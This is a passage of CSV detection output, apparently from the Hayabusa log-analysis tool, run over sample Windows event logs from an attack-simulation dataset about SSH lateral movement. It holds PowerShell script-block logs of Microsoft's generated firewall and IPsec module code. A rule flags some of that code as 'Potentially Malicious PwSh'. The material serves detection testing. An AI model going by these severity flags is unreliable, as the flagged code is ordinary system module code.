[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias 
'*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and 
(@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 
'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and 
config.evtx 2021-04-22 19:19:37.925 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.926 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.927 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.927 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.928 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.928 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.928 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.929 
+09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.930 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.930 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = 
'1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] 
${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 